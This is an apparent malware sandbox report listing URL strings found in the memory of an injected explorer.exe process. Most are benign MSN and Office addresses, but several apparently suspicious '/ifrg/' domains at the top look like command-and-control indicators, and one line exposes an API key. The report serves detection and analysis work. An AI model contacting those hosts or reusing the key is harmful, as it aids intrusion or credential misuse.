Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vespeciative.com
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vespeciative.com/ifrg/
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vespeciative.com/ifrg/www.skatingisamazing.com
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vespeciative.comReferer:
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zysport.net
Source: explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zysport.net/ifrg/
Source: explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zysport.netReferer:
Source: explorer.exe, 00000010.00000003.3083803433.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2292272556.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1542765374.000000000BD22000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(
Source: explorer.exe, 00000010.00000003.2292272556.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3907642748.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1542765374.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3083159268.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2293797642.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000010.00000003.2292272556.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3907642748.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1542765374.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3083159268.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2293797642.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSJM
Source: explorer.exe, 00000010.00000003.2292272556.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3907642748.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1542765374.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3083159268.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2293797642.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSZM
Source: explorer.exe, 00000010.00000003.2292272556.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3907642748.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1542765374.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3083159268.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2293797642.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSp
Source: explorer.exe, 00000010.00000003.3081820013.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3900398108.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291641463.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.0000000008796000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/rT
Source: explorer.exe, 00000010.00000003.3084418132.0000000008650000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc
Source: explorer.exe, 00000010.00000003.3084418132.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3081820013.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3900398108.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291641463.0000000008685000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?z$
Source: explorer.exe, 00000010.00000003.3081820013.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3900398108.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291641463.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.0000000008796000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/~T
Source: explorer.exe, 00000010.00000003.3080938875.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1535149000.0000000002F10000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000010.00000003.3084418132.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3081820013.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3900398108.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291641463.0000000008685000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
Source: explorer.exe, 00000010.00000003.2292272556.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3907642748.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1542765374.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3083159268.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2293797642.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
Source: explorer.exe, 00000010.00000003.2292272556.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3907642748.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1542765374.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3083159268.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2293797642.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
Source: explorer.exe, 00000010.00000003.2292272556.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3907642748.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1542765374.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3083159268.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2293797642.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000010.00000003.3081621435.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291407142.000000000899E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/bat
Source: explorer.exe, 00000010.00000003.2292272556.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3907642748.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1542765374.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3083159268.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2293797642.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.stacker.com/arizona/phoenix
Source: explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
